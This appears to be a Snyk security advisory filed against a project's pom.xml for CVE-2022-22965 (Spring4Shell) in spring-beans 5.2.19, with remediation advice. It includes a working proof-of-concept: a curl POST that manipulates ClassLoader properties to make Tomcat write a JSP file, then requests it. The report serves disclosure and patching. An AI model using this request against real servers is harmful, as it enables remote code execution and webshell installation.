Package Name: org.springframework:spring-beans
Package Version: ['5.2.19.RELEASE']
Package Manager: maven
Target File: todolist-web-common/pom.xml
Severity Level: critical
Snyk ID: SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751
Snyk CVE: CVE-2022-22965
Snyk CWE: CWE-94
Link to issue in Snyk: https://app.snyk.io/org/rhicksiii91/project/c26ba307-fafe-4ac3-a7ea-4c53e9d22e2c
Snyk Description: ## Overview
org.springframework:spring-beans is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.
Affected versions of this package are vulnerable to Remote Code Execution via manipulation of ClassLoader that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (Tomcat), or download arbitrary files from the server (Payara/Glassfish).
Note:
- Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara or Glassfish.
- However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well.
- As such, while we recommend users prioritise first remediating against the configuration described above, for full protection we also recommend upgrading all vulnerable versions to the fixed spring-beans version regardless of the application configuration.
## Update Log
- 31/03/2022 - Severity was raised from 8.1 to 9.8
- 08/04/2022 - Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish).
## PoC
1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0
2/ ./mvnw install
3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps
4/ curl -X POST \
-H "pre:<%" \
-H "post:;%>" \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \
-F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \
http://localhost:8888/handling-form-submission-complete/greeting
5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp
## Remediation
Upgrade org.springframework:spring-beans to version 5.2.20, 5.3.18 or higher.